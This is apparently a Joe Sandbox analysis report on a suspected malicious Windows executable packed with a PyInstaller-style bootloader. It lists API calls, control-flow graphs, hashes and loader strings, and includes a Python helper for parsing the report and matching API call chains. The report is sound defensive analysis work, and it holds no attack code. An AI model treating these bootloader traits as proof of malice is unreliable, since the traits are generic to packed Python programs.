• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
• Instruction ID: 3ebe62b530dbe395818ae56b507cd4531cc80e8cb1b47b6e0aadcfa77e58790f
• Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
• Instruction Fuzzy Hash: 8481C131A1A68285EB13AB2C90442AAF3A1EB66740F844435DB4D8B79DFEBCE045C724

Control-flow Graph

control_flow_graph 409 7ff7b2b61600-7ff7b2b61611 410 7ff7b2b61637-7ff7b2b61651 call 7ff7b2b645c0 409->410 411 7ff7b2b61613-7ff7b2b6161c call 7ff7b2b61050 409->411 418 7ff7b2b61653-7ff7b2b61681 call 7ff7b2b74f08 call 7ff7b2b62910 410->418 419 7ff7b2b61682-7ff7b2b6169c call 7ff7b2b645c0 410->419 416 7ff7b2b6162e-7ff7b2b61636 411->416 417 7ff7b2b6161e-7ff7b2b61629 call 7ff7b2b62710 411->417 417->416 425 7ff7b2b6169e-7ff7b2b616b3 call 7ff7b2b62710 419->425 426 7ff7b2b616b8-7ff7b2b616cf call 7ff7b2b706d4 419->426 433 7ff7b2b61821-7ff7b2b61824 call 7ff7b2b7004c 425->433 434 7ff7b2b616f9-7ff7b2b616fd 426->434 435 7ff7b2b616d1-7ff7b2b616f4 call 7ff7b2b74f08 call 7ff7b2b62910 426->435 441 7ff7b2b61829-7ff7b2b6183b 433->441 438 7ff7b2b61717-7ff7b2b61737 call 7ff7b2b74f44 434->438 439 7ff7b2b616ff-7ff7b2b6170b call 7ff7b2b61210 434->439 447 7ff7b2b61819-7ff7b2b6181c call 7ff7b2b7004c 435->447 448 7ff7b2b61739-7ff7b2b6175c call 7ff7b2b74f08 call 7ff7b2b62910 438->448 449 7ff7b2b61761-7ff7b2b6176c 438->449 446 7ff7b2b61710-7ff7b2b61712 439->446 446->447 447->433 463 7ff7b2b6180f-7ff7b2b61814 448->463 453 7ff7b2b61802-7ff7b2b6180a call 7ff7b2b74f30 449->453 454 7ff7b2b61772-7ff7b2b61777 449->454 453->463 456 7ff7b2b61780-7ff7b2b617a2 call 7ff7b2b7039c 454->456 464 7ff7b2b617da-7ff7b2b617e6 call 7ff7b2b74f08 456->464 465 7ff7b2b617a4-7ff7b2b617bc call 7ff7b2b70adc 456->465 463->447 472 7ff7b2b617ed-7ff7b2b617f8 call 7ff7b2b62910 464->472 470 7ff7b2b617be-7ff7b2b617c1 465->470 471 7ff7b2b617c5-7ff7b2b617d8 call 7ff7b2b74f08 465->471 470->456 473 7ff7b2b617c3 470->473 471->472 476 7ff7b2b617fd 472->476 473->476 476->453
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 80c814cc98e6b2aff898b1ce4eb0b94af8f5089607ff04406bfc182d1f16ad7b
• Instruction ID: 801cc7101296fededb8cf7b9658180df8f68eae9e06a7eda00eb612a8e25d809
• Opcode Fuzzy Hash: 80c814cc98e6b2aff898b1ce4eb0b94af8f5089607ff04406bfc182d1f16ad7b
• Instruction Fuzzy Hash: 41518F61A1A64281EA17BB2994001A7F360AF62794FC44535EF0C877AEFEBCE555C324

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B68704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6870A
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6874C
• Part of subcall function 00007FF7B2B68830: GetEnvironmentVariableW.KERNEL32(00007FF7B2B6388E), ref: 00007FF7B2B68867
• Part of subcall function 00007FF7B2B68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B2B68889
• Part of subcall function 00007FF7B2B78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B78251
• Part of subcall function 00007FF7B2B62810: MessageBoxW.USER32 ref: 00007FF7B2B628EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
• Instruction ID: 093af77840f8d4d39685e86d7ea05eef8b0997deeb2c615fd80b986a5536432a
• Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
• Instruction Fuzzy Hash: 4F419211A1B64280F917B72D98552BBD261AF66780FC04532DF0D8B7AEFEBCE505C224

Control-flow Graph

control_flow_graph 756 7ff7b2b61210-7ff7b2b6126d call 7ff7b2b6bd80 759 7ff7b2b61297-7ff7b2b612af call 7ff7b2b74f44 756->759 760 7ff7b2b6126f-7ff7b2b61296 call 7ff7b2b62710 756->760 765 7ff7b2b612d4-7ff7b2b612e4 call 7ff7b2b74f44 759->765 766 7ff7b2b612b1-7ff7b2b612cf call 7ff7b2b74f08 call 7ff7b2b62910 759->766 772 7ff7b2b61309-7ff7b2b6131b 765->772 773 7ff7b2b612e6-7ff7b2b61304 call 7ff7b2b74f08 call 7ff7b2b62910 765->773 777 7ff7b2b61439-7ff7b2b6146d call 7ff7b2b6ba60 call 7ff7b2b74f30 * 2 766->777 776 7ff7b2b61320-7ff7b2b61345 call 7ff7b2b7039c 772->776 773->777 785 7ff7b2b6134b-7ff7b2b61355 call 7ff7b2b70110 776->785 786 7ff7b2b61431 776->786 785->786 792 7ff7b2b6135b-7ff7b2b61367 785->792 786->777 794 7ff7b2b61370-7ff7b2b61398 call 7ff7b2b6a1c0 792->794 797 7ff7b2b6139a-7ff7b2b6139d 794->797 798 7ff7b2b61416-7ff7b2b6142c call 7ff7b2b62710 794->798 799 7ff7b2b6139f-7ff7b2b613a9 797->799 800 7ff7b2b61411 797->800 798->786 802 7ff7b2b613ab-7ff7b2b613b9 call 7ff7b2b70adc 799->802 803 7ff7b2b613d4-7ff7b2b613d7 799->803 800->798 809 7ff7b2b613be-7ff7b2b613c1 802->809 804 7ff7b2b613ea-7ff7b2b613ef 803->804 805 7ff7b2b613d9-7ff7b2b613e7 call 7ff7b2b89e30 803->805 804->794 808 7ff7b2b613f5-7ff7b2b613f8 804->808 805->804 811 7ff7b2b6140c-7ff7b2b6140f 808->811 812 7ff7b2b613fa-7ff7b2b613fd 808->812 813 7ff7b2b613c3-7ff7b2b613cd call 7ff7b2b70110 809->813 814 7ff7b2b613cf-7ff7b2b613d2 809->814 811->786 812->798 815 7ff7b2b613ff-7ff7b2b61407 812->815 813->804 813->814 814->798 815->776
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
• Instruction ID: 53144fe4709357f67e346b8ad92ddd747339be192bd9fb102a0e99d6239dbdf4
• Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
• Instruction Fuzzy Hash: 8E51C522A1A64241EA23BB1994403BBF290AF66794FC84135EF4D87BDDFEBCD441C714

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE98
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                    • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                    • Instruction ID: 30eefac5b35745a67b1a957fa5a0ed03e842d405244f33a7870cf7a1797b0eb3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E41F82171A60181EA57BB1E9804577A291BF6AB90FC84539DE1D873ACFEBCE406C321

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636E1
• GetLastError.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636EB
  • Part of subcall function 00007FF7B2B62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
  • Part of subcall function 00007FF7B2B62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
  • Part of subcall function 00007FF7B2B62C50: MessageBoxW.USER32 ref: 00007FF7B2B62D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: 641b8400098f2f3acf4fcd732b4effddf6d016ed010af632c210c6f7a9a5f212
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction Fuzzy Hash: 5621B461B1A64240FA23BB28E8053B7E250BF66744FC44236D75DC65DDFEACE505C328

Control-flow Graph

• Function: 7ff7b2b7ba5c-7ff7b2b7bea8 (legend: Executed / Not Executed)
• Graph edge list omitted; API calls that appear in the graph: GetConsoleMode, ReadConsoleW, ReadFile, GetLastError
• Internal subcalls in the graph: 7ff7b2b74ee8, 7ff7b2b74f08, 7ff7b2b7a8e0, 7ff7b2b7a948, 7ff7b2b7c284, 7ff7b2b8391c, 7ff7b2b7b674, 7ff7b2b7b4b4, 7ff7b2b74e7c, 7ff7b2b7d5fc
APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
• Instruction ID: d02fc6633896ac90d382300f4ea824b33d28cd48348f4247507f146611441c55
• Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
• Instruction Fuzzy Hash: 44C1D52290D68691E6627B1D90402BFF660EBA3B90FD54131EB4D077ADEEFCE445CB20

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
• Instruction ID: c4c61c8401e5331d7924af190426d5a6140179d29da209a2eb848dfd01648c6b
• Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
• Instruction Fuzzy Hash: 95217821A0D64242DA12AB5DB44413BE3A0FF927A0F900635D76D876EDEEBCD449C710
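The "APIs" listings on this page follow one fixed layout (an optional "Part of subcall function <addr>:" prefix, then Api.MODULE, optional arguments, then "ref: <call-site address>"), and every "Memory Dump Source" entry gives the module base the ref addresses are relative to (Offset: 00007FF7B2B60000). The following is an added example, not Joe Sandbox's own code: it parses those bullets into structured records, rebases each call site onto the image base so it can be looked up in the on-disk PE, and checks a listing for an ordered API sequence such as the OpenProcessToken, GetTokenInformation, ConvertSidToStringSidW chain shown above. The sample input is copied from this page's own listings; the helper names (parse_api_block, call_sequence, contains_in_order) are this example's, not the report's.

```python
"""Parse Joe Sandbox "APIs" bullets into call records and rebase call sites.

Added example (not Joe Sandbox code). Assumes the bullet layout shown on this
report page and the image base from its "Memory Dump Source" lines.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Image base of the main module, from "Offset: 00007FF7B2B60000" on this page.
MODULE_BASE = 0x00007FF7B2B60000

# One "APIs" bullet: optional subcall prefix, Api.MODULE, optional "(args)",
# then "ref: <call-site address>". Arguments never contain parentheses here.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample: lines copied from this page's token/SID block.
SAMPLE_TOKEN_BLOCK = """\
• Part of subcall function 00007FF7B2B68570: GetCurrentProcess.KERNEL32 ref: 00007FF7B2B68590
• Part of subcall function 00007FF7B2B68570: OpenProcessToken.ADVAPI32 ref: 00007FF7B2B685A3
• Part of subcall function 00007FF7B2B68570: GetTokenInformation.KERNELBASE ref: 00007FF7B2B685C8
• Part of subcall function 00007FF7B2B68570: GetLastError.KERNEL32 ref: 00007FF7B2B685D2
• Part of subcall function 00007FF7B2B68570: GetTokenInformation.KERNELBASE ref: 00007FF7B2B68612
• Part of subcall function 00007FF7B2B68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7B2B6862E
• Part of subcall function 00007FF7B2B68570: CloseHandle.KERNEL32 ref: 00007FF7B2B68646
• LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B6916C
• LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B69175
"""

# Constructed sample: lines copied from this page's FreeLibrary/GetProcAddress block.
SAMPLE_LOADER_BLOCK = """\
• FreeLibrary.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE98
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                  # None for '?', int for hex immediates (may be negative)
    ref: int                    # call-site virtual address as dumped
    subcall_of: Optional[int]   # address of the inner function that made the call, if any

    @property
    def rva(self) -> int:
        """Call-site offset relative to the image base (usable on the PE in IDA)."""
        return self.ref - MODULE_BASE


def _parse_arg(tok: str):
    tok = tok.strip()
    return None if tok in ("?", "") else int(tok, 16)


def parse_api_block(text: str) -> list[ApiCall]:
    """Turn the bullet lines of one "APIs" section into ApiCall records, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings and non-API lines are skipped
        raw = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=[_parse_arg(a) for a in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def call_sequence(calls: list[ApiCall], include_subcalls: bool = True) -> list[str]:
    """API names in listing order, optionally only those made by the function itself."""
    return [c.api for c in calls if include_subcalls or c.subcall_of is None]


def contains_in_order(calls: list[ApiCall], pattern: list[str]) -> bool:
    """True if `pattern` occurs as an ordered (not necessarily adjacent) subsequence."""
    it = iter(call_sequence(calls))
    return all(any(name == want for name in it) for want in pattern)


if __name__ == "__main__":
    for c in parse_api_block(SAMPLE_TOKEN_BLOCK):
        where = f"via {c.subcall_of:X}" if c.subcall_of else "direct"
        print(f"{c.api:24s} {c.module:10s} rva=0x{c.rva:X} ({where})")
    sid_chain = ["OpenProcessToken", "GetTokenInformation", "ConvertSidToStringSidW"]
    print("SID-string chain present:",
          contains_in_order(parse_api_block(SAMPLE_TOKEN_BLOCK), sid_chain))
```

The rebased offsets let you jump from a report entry to the same call site in the on-disk binary (the report states the dump is based on the PE at 00007FF7B2B60000), and the ordered-subsequence check is the shape of rule you would write to flag the current-user SID lookup wherever it appears across a report's function blocks, regardless of the interleaved GetLastError and CloseHandle calls.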

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetCurrentProcess.KERNEL32 ref: 00007FF7B2B68590
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: OpenProcessToken.ADVAPI32 ref: 00007FF7B2B685A3
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetTokenInformation.KERNELBASE ref: 00007FF7B2B685C8
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetLastError.KERNEL32 ref: 00007FF7B2B685D2
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetTokenInformation.KERNELBASE ref: 00007FF7B2B68612
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7B2B6862E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: CloseHandle.KERNEL32 ref: 00007FF7B2B68646
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B6916C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B69175
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                    • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                    • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                    • Instruction ID: a1c2d7425939e692418158c82e1be020349cd66edfe2a0c145be662581a439fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA218421A0A64241F612BB24E4192FBE260FFA6740FD44036EB4D8779AFFBCD845C760
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7B2B6352C,?,00000000,00007FF7B2B63F23), ref: 00007FF7B2B67F32
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateDirectory
                                                                                                                                                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                    • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                    • Instruction ID: 15aecafb24736590959e6cd368225bfc718b08f0bad3f72adcab04ac7a9c0af8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4131E92161AAC145FA23AB25E4107EBE254EBA5BE0F840231EB6D877CDFE6CD505C714
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D07C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D107
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
